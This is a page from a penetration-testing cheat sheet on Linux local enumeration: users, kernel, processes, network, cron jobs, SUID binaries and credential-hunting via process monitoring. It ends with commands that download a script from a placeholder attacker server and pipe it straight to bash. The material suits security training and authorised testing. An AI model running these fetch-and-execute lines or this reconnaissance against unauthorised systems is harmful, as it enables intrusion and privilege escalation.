Local Enumeration

Users

Enumerate the current user ID (UID), group ID (GID), and the groups the user belongs to.

id
uid=1001(john) gid=1001(john) groups=1001(john),27(sudo) # john's result

Enumerate basic information of all users using /etc/passwd.

cat /etc/passwd

The following example describes a line of /etc/passwd file.

john:x:1001:1001:John Doe:/home/john:/bin/bash
username:password:uid:gid:gecos:home directory:shell

Username: The login name (1-32 characters).
Password: An x means the password is stored in /etc/shadow.
User ID (UID): Unique ID for the user. UID 0 is for root, 1-99 are reserved, and 100-999 are for system accounts.
Group ID (GID): The primary group ID, found in /etc/group.
User Info (GECOS): Optional user information like full name or contact info.
Home Directory: The user's default directory when logging in.
Shell: The user's default shell, like /bin/bash, or /sbin/nologin to prevent login.

System information

Enumerate hostname.

hostname

Enumerate operating system version.

cat /etc/issue

cat /etc/os-release

Enumerate kernel version and architecture.

uname -a

User configurations

list sudoer capabilities of current user.

sudo -l

List environment variables.

env

List config files such as bash profile.

ls -la <home_directory>

Processes

Enumerate all processes in a user readable format.

ps aux

Monitor Processes.

watch -n 1 "ps -aux | grep pass"

It also possible to monitor running processes at live time using pspy tool.

Network

Enumerate all network interfaces, this includes physical and virtual networks.

ip a

ifconfig

Display the routing tables.

route

Enumerate connections.

ss -anp

netstat -tulnp

Enumerate firewall rules.

cat /etc/iptables/rules.v4

Scheduled tasks

Scheduled tasks in Linux also known as "Cron Jobs" and configured using the crontab command-line tool.

Crontab Files

User-specific crontabs: Stored separately for each user and managed by the crontab command.
System-wide crontab: Found in /etc/crontab. This file allows specifying jobs for different users.
Cron directories:
- /etc/cron.hourly: Tasks that run every hour.
- /etc/cron.daily: Tasks that run daily.
- /etc/cron.weekly: Tasks that run weekly.
- /etc/cron.monthly: Tasks that run monthly.

Listing tasks files.

ls -lah /etc/cron*

Find tasks in the system logs.

grep "CRON" /var/log/syslog

Enumerate the current user's scheduled jobs.

crontab -l

Application

Listing installed applications.

dpkg -l

File System

List all drives at boot time.

cat /tec/fstab

List all mounted file systems.

mount

List all available disks.

lsblk

Enumerate loaded Kernel modules.

lsmod

Gather more information about the kernel module.

/sbin/modinfo <module>

SUID Binaries

Enumerate SUID binaries.

find / -perm /4000 -type f 2>/dev/null

Automated Enumeration

Download and execute LinPEAS or unix-privesc-check:

# LinPEAS
curl -L http://<attacker_http_server>/linpeas.sh | bash 

# unix-privesc-check
wget http://<attacker_http_server>/unix-privesc-check && chmod +x unix-privesc-check && ./unix-privesc-check <standard | detailed>

PreviousSNMP NextLocal Privileges Escalation

Last updated 1 year ago